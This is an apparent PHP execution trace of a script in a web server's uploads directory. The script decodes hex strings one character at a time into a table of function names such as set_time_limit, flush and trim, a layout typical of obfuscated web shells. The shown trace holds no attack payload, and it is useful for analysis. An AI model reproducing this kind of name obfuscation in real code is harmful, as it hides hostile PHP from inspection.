3	1027	0	0.037851	584952	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1027	1	0.037862	584992
3	1027	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1028	0	0.037893	584984	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1028	1	0.037904	585032
3	1028	R			105
3	1029	0	0.037917	584952	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1029	1	0.037929	584992
3	1029	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1030	0	0.037960	584984	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	1030	1	0.037972	585032
3	1030	R			109
3	1031	0	0.037985	584952	chr	0		/var/www/html/uploads/index.php	178	1	109
3	1031	1	0.037996	584992
3	1031	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1032	0	0.038027	584984	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1032	1	0.038039	585032
3	1032	R			101
3	1033	0	0.038052	584952	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1033	1	0.038063	584992
3	1033	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1034	0	0.038094	584992	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1034	1	0.038110	585040
3	1034	R			95
3	1035	0	0.038123	584960	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1035	1	0.038134	585000
3	1035	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1036	0	0.038165	584992	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	1036	1	0.038177	585040
3	1036	R			108
3	1037	0	0.038189	584960	chr	0		/var/www/html/uploads/index.php	178	1	108
3	1037	1	0.038201	585000
3	1037	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1038	0	0.038232	584992	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1038	1	0.038244	585040
3	1038	R			105
3	1039	0	0.038257	584960	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1039	1	0.038268	585000
3	1039	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1040	0	0.038299	584992	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	1040	1	0.038311	585040
3	1040	R			109
3	1041	0	0.038324	584960	chr	0		/var/www/html/uploads/index.php	178	1	109
3	1041	1	0.038335	585000
3	1041	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1042	0	0.038365	584992	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1042	1	0.038377	585040
3	1042	R			105
3	1043	0	0.038390	584960	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1043	1	0.038401	585000
3	1043	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1044	0	0.038431	584992	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1044	1	0.038443	585040
3	1044	R			116
3	1045	0	0.038455	584960	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1045	1	0.038467	585000
3	1045	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1017	1	0.038497	584960
2	1017	R			'set_time_limit'
1		A						/var/www/html/uploads/index.php	8	$func[51] = 'set_time_limit'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1046	0	0.038532	584960	dehex	1		/var/www/html/uploads/index.php	8	1	'636c656172737461746361636865'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 27
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1047	0	0.038574	584992	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	1047	1	0.038586	585040
3	1047	R			99
3	1048	0	0.038599	584960	chr	0		/var/www/html/uploads/index.php	178	1	99
3	1048	1	0.038610	585000
3	1048	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1049	0	0.038641	585024	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	1049	1	0.038653	585072
3	1049	R			108
3	1050	0	0.038666	584992	chr	0		/var/www/html/uploads/index.php	178	1	108
3	1050	1	0.038678	585032
3	1050	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1051	0	0.038708	585024	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1051	1	0.038720	585072
3	1051	R			101
3	1052	0	0.038733	584992	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1052	1	0.038745	585032
3	1052	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1053	0	0.038775	585024	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	1053	1	0.038787	585072
3	1053	R			97
3	1054	0	0.038799	584992	chr	0		/var/www/html/uploads/index.php	178	1	97
3	1054	1	0.038811	585032
3	1054	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1055	0	0.038844	585024	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	1055	1	0.038856	585072
3	1055	R			114
3	1056	0	0.038868	584992	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1056	1	0.038880	585032
3	1056	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1057	0	0.038910	585024	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1057	1	0.038921	585072
3	1057	R			115
3	1058	0	0.038934	584992	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1058	1	0.038945	585032
3	1058	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1059	0	0.038975	585024	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1059	1	0.038987	585072
3	1059	R			116
3	1060	0	0.038999	584992	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1060	1	0.039010	585032
3	1060	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1061	0	0.039040	585024	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	1061	1	0.039052	585072
3	1061	R			97
3	1062	0	0.039065	584992	chr	0		/var/www/html/uploads/index.php	178	1	97
3	1062	1	0.039076	585032
3	1062	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1063	0	0.039107	585032	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1063	1	0.039118	585080
3	1063	R			116
3	1064	0	0.039131	585000	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1064	1	0.039142	585040
3	1064	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1065	0	0.039172	585032	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	1065	1	0.039183	585080
3	1065	R			99
3	1066	0	0.039196	585000	chr	0		/var/www/html/uploads/index.php	178	1	99
3	1066	1	0.039207	585040
3	1066	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1067	0	0.039237	585032	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	1067	1	0.039249	585080
3	1067	R			97
3	1068	0	0.039262	585000	chr	0		/var/www/html/uploads/index.php	178	1	97
3	1068	1	0.039273	585040
3	1068	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1069	0	0.039303	585032	hexdec	0		/var/www/html/uploads/index.php	178	1	'63'
3	1069	1	0.039315	585080
3	1069	R			99
3	1070	0	0.039327	585000	chr	0		/var/www/html/uploads/index.php	178	1	99
3	1070	1	0.039339	585040
3	1070	R			'c'
2		A						/var/www/html/uploads/index.php	178	$r .= 'c'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1071	0	0.039369	585032	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	1071	1	0.039381	585080
3	1071	R			104
3	1072	0	0.039393	585000	chr	0		/var/www/html/uploads/index.php	178	1	104
3	1072	1	0.039405	585040
3	1072	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1073	0	0.039435	585032	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1073	1	0.039447	585080
3	1073	R			101
3	1074	0	0.039459	585000	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1074	1	0.039471	585040
3	1074	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1046	1	0.039502	585000
2	1046	R			'clearstatcache'
1		A						/var/www/html/uploads/index.php	8	$func[52] = 'clearstatcache'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1075	0	0.039537	585000	dehex	1		/var/www/html/uploads/index.php	8	1	'646174655f64656661756c745f74696d657a6f6e655f736574'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 49
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1076	0	0.039585	585032	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	1076	1	0.039597	585080
3	1076	R			100
3	1077	0	0.039609	585000	chr	0		/var/www/html/uploads/index.php	178	1	100
3	1077	1	0.039621	585040
3	1077	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1078	0	0.039652	585064	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	1078	1	0.039664	585112
3	1078	R			97
3	1079	0	0.039676	585032	chr	0		/var/www/html/uploads/index.php	178	1	97
3	1079	1	0.039688	585072
3	1079	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1080	0	0.039718	585064	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1080	1	0.039730	585112
3	1080	R			116
3	1081	0	0.039743	585032	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1081	1	0.039754	585072
3	1081	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1082	0	0.039785	585064	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1082	1	0.039797	585112
3	1082	R			101
3	1083	0	0.039809	585032	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1083	1	0.039821	585072
3	1083	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1084	0	0.039851	585064	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1084	1	0.039863	585112
3	1084	R			95
3	1085	0	0.039876	585032	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1085	1	0.039887	585072
3	1085	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1086	0	0.039918	585064	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	1086	1	0.039930	585112
3	1086	R			100
3	1087	0	0.039942	585032	chr	0		/var/www/html/uploads/index.php	178	1	100
3	1087	1	0.039954	585072
3	1087	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1088	0	0.039984	585064	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1088	1	0.039996	585112
3	1088	R			101
3	1089	0	0.040009	585032	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1089	1	0.040020	585072
3	1089	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1090	0	0.040051	585064	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	1090	1	0.040063	585112
3	1090	R			102
3	1091	0	0.040076	585032	chr	0		/var/www/html/uploads/index.php	178	1	102
3	1091	1	0.040088	585072
3	1091	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1092	0	0.040118	585072	hexdec	0		/var/www/html/uploads/index.php	178	1	'61'
3	1092	1	0.040130	585120
3	1092	R			97
3	1093	0	0.040142	585040	chr	0		/var/www/html/uploads/index.php	178	1	97
3	1093	1	0.040154	585080
3	1093	R			'a'
2		A						/var/www/html/uploads/index.php	178	$r .= 'a'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1094	0	0.040184	585072	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	1094	1	0.040195	585120
3	1094	R			117
3	1095	0	0.040208	585040	chr	0		/var/www/html/uploads/index.php	178	1	117
3	1095	1	0.040219	585080
3	1095	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1096	0	0.040249	585072	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	1096	1	0.040261	585120
3	1096	R			108
3	1097	0	0.040273	585040	chr	0		/var/www/html/uploads/index.php	178	1	108
3	1097	1	0.040288	585080
3	1097	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1098	0	0.040319	585072	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1098	1	0.040331	585120
3	1098	R			116
3	1099	0	0.040343	585040	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1099	1	0.040354	585080
3	1099	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1100	0	0.040384	585072	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1100	1	0.040396	585120
3	1100	R			95
3	1101	0	0.040409	585040	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1101	1	0.040420	585080
3	1101	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1102	0	0.040450	585072	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1102	1	0.040462	585120
3	1102	R			116
3	1103	0	0.040474	585040	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1103	1	0.040485	585080
3	1103	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1104	0	0.040515	585072	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1104	1	0.040527	585120
3	1104	R			105
3	1105	0	0.040539	585040	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1105	1	0.040550	585080
3	1105	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1106	0	0.040580	585072	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	1106	1	0.040591	585120
3	1106	R			109
3	1107	0	0.040603	585040	chr	0		/var/www/html/uploads/index.php	178	1	109
3	1107	1	0.040615	585080
3	1107	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1108	0	0.040645	585080	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1108	1	0.040657	585128
3	1108	R			101
3	1109	0	0.040669	585048	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1109	1	0.040681	585088
3	1109	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1110	0	0.040710	585080	hexdec	0		/var/www/html/uploads/index.php	178	1	'7a'
3	1110	1	0.040722	585128
3	1110	R			122
3	1111	0	0.040735	585048	chr	0		/var/www/html/uploads/index.php	178	1	122
3	1111	1	0.040746	585088
3	1111	R			'z'
2		A						/var/www/html/uploads/index.php	178	$r .= 'z'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1112	0	0.040777	585080	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	1112	1	0.040788	585128
3	1112	R			111
3	1113	0	0.040801	585048	chr	0		/var/www/html/uploads/index.php	178	1	111
3	1113	1	0.040812	585088
3	1113	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1114	0	0.040842	585080	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	1114	1	0.040854	585128
3	1114	R			110
3	1115	0	0.040866	585048	chr	0		/var/www/html/uploads/index.php	178	1	110
3	1115	1	0.040878	585088
3	1115	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1116	0	0.040907	585080	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1116	1	0.040919	585128
3	1116	R			101
3	1117	0	0.040932	585048	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1117	1	0.040943	585088
3	1117	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1118	0	0.040973	585080	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1118	1	0.040985	585128
3	1118	R			95
3	1119	0	0.040998	585048	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1119	1	0.041013	585088
3	1119	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1120	0	0.041048	585080	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1120	1	0.041060	585128
3	1120	R			115
3	1121	0	0.041073	585048	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1121	1	0.041084	585088
3	1121	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1122	0	0.041114	585080	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1122	1	0.041125	585128
3	1122	R			101
3	1123	0	0.041138	585048	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1123	1	0.041149	585088
3	1123	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1124	0	0.041199	585088	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1124	1	0.041212	585136
3	1124	R			116
3	1125	0	0.041225	585056	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1125	1	0.041236	585096
3	1125	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1075	1	0.041266	585056
2	1075	R			'date_default_timezone_set'
1		A						/var/www/html/uploads/index.php	8	$func[53] = 'date_default_timezone_set'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1126	0	0.041302	585056	dehex	1		/var/www/html/uploads/index.php	8	1	'666c757368'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 9
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1127	0	0.041343	585088	hexdec	0		/var/www/html/uploads/index.php	178	1	'66'
3	1127	1	0.041355	585136
3	1127	R			102
3	1128	0	0.041368	585056	chr	0		/var/www/html/uploads/index.php	178	1	102
3	1128	1	0.041379	585096
3	1128	R			'f'
2		A						/var/www/html/uploads/index.php	178	$r .= 'f'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1129	0	0.041410	585120	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	1129	1	0.041422	585168
3	1129	R			108
3	1130	0	0.041435	585088	chr	0		/var/www/html/uploads/index.php	178	1	108
3	1130	1	0.041446	585128
3	1130	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1131	0	0.041477	585120	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	1131	1	0.041488	585168
3	1131	R			117
3	1132	0	0.041501	585088	chr	0		/var/www/html/uploads/index.php	178	1	117
3	1132	1	0.041512	585128
3	1132	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1133	0	0.041543	585120	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1133	1	0.041554	585168
3	1133	R			115
3	1134	0	0.041567	585088	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1134	1	0.041578	585128
3	1134	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1135	0	0.041608	585120	hexdec	0		/var/www/html/uploads/index.php	178	1	'68'
3	1135	1	0.041620	585168
3	1135	R			104
3	1136	0	0.041632	585088	chr	0		/var/www/html/uploads/index.php	178	1	104
3	1136	1	0.041644	585128
3	1136	R			'h'
2		A						/var/www/html/uploads/index.php	178	$r .= 'h'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1126	1	0.041674	585088
2	1126	R			'flush'
1		A						/var/www/html/uploads/index.php	8	$func[54] = 'flush'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1137	0	0.041707	585088	dehex	1		/var/www/html/uploads/index.php	8	1	'7374726c656e'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 11
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1138	0	0.041752	585120	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1138	1	0.041764	585168
3	1138	R			115
3	1139	0	0.041776	585088	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1139	1	0.041788	585128
3	1139	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1140	0	0.041818	585152	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1140	1	0.041830	585200
3	1140	R			116
3	1141	0	0.041843	585120	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1141	1	0.041854	585160
3	1141	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1142	0	0.041884	585152	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	1142	1	0.041896	585200
3	1142	R			114
3	1143	0	0.041908	585120	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1143	1	0.041920	585160
3	1143	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1144	0	0.041951	585152	hexdec	0		/var/www/html/uploads/index.php	178	1	'6c'
3	1144	1	0.041963	585200
3	1144	R			108
3	1145	0	0.041975	585120	chr	0		/var/www/html/uploads/index.php	178	1	108
3	1145	1	0.041987	585160
3	1145	R			'l'
2		A						/var/www/html/uploads/index.php	178	$r .= 'l'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1146	0	0.042017	585152	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1146	1	0.042029	585200
3	1146	R			101
3	1147	0	0.042041	585120	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1147	1	0.042053	585160
3	1147	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1148	0	0.042083	585152	hexdec	0		/var/www/html/uploads/index.php	178	1	'6e'
3	1148	1	0.042095	585200
3	1148	R			110
3	1149	0	0.042108	585120	chr	0		/var/www/html/uploads/index.php	178	1	110
3	1149	1	0.042119	585160
3	1149	R			'n'
2		A						/var/www/html/uploads/index.php	178	$r .= 'n'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1137	1	0.042149	585120
2	1137	R			'strlen'
1		A						/var/www/html/uploads/index.php	8	$func[55] = 'strlen'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1150	0	0.042183	585120	dehex	1		/var/www/html/uploads/index.php	8	1	'7472696d'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 7
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1151	0	0.042224	585152	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1151	1	0.042236	585200
3	1151	R			116
3	1152	0	0.042248	585120	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1152	1	0.042260	585160
3	1152	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1153	0	0.042291	585184	hexdec	0		/var/www/html/uploads/index.php	178	1	'72'
3	1153	1	0.042302	585232
3	1153	R			114
3	1154	0	0.042315	585152	chr	0		/var/www/html/uploads/index.php	178	1	114
3	1154	1	0.042326	585192
3	1154	R			'r'
2		A						/var/www/html/uploads/index.php	178	$r .= 'r'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1155	0	0.042357	585184	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1155	1	0.042368	585232
3	1155	R			105
3	1156	0	0.042381	585152	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1156	1	0.042392	585192
3	1156	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1157	0	0.042423	585184	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	1157	1	0.042434	585232
3	1157	R			109
3	1158	0	0.042447	585152	chr	0		/var/www/html/uploads/index.php	178	1	109
3	1158	1	0.042458	585192
3	1158	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1150	1	0.042493	585152
2	1150	R			'trim'
1		A						/var/www/html/uploads/index.php	8	$func[56] = 'trim'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1159	0	0.042526	585152	dehex	1		/var/www/html/uploads/index.php	8	1	'656d707479'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 9
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1160	0	0.042567	585184	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1160	1	0.042578	585232
3	1160	R			101
3	1161	0	0.042591	585152	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1161	1	0.042602	585192
3	1161	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1162	0	0.042633	585216	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	1162	1	0.042645	585264
3	1162	R			109
3	1163	0	0.042658	585184	chr	0		/var/www/html/uploads/index.php	178	1	109
3	1163	1	0.042669	585224
3	1163	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1164	0	0.042700	585216	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	1164	1	0.042711	585264
3	1164	R			112
3	1165	0	0.042724	585184	chr	0		/var/www/html/uploads/index.php	178	1	112
3	1165	1	0.042736	585224
3	1165	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1166	0	0.042766	585216	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1166	1	0.042778	585264
3	1166	R			116
3	1167	0	0.042790	585184	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1167	1	0.042802	585224
3	1167	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1168	0	0.042832	585216	hexdec	0		/var/www/html/uploads/index.php	178	1	'79'
3	1168	1	0.042844	585264
3	1168	R			121
3	1169	0	0.042856	585184	chr	0		/var/www/html/uploads/index.php	178	1	121
3	1169	1	0.042868	585224
3	1169	R			'y'
2		A						/var/www/html/uploads/index.php	178	$r .= 'y'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1159	1	0.042897	585184
2	1159	R			'empty'
1		A						/var/www/html/uploads/index.php	8	$func[57] = 'empty'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1170	0	0.042931	585184	dehex	1		/var/www/html/uploads/index.php	8	1	'6973736574'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 9
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1171	0	0.042972	585216	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1171	1	0.042984	585264
3	1171	R			105
3	1172	0	0.042996	585184	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1172	1	0.043008	585224
3	1172	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
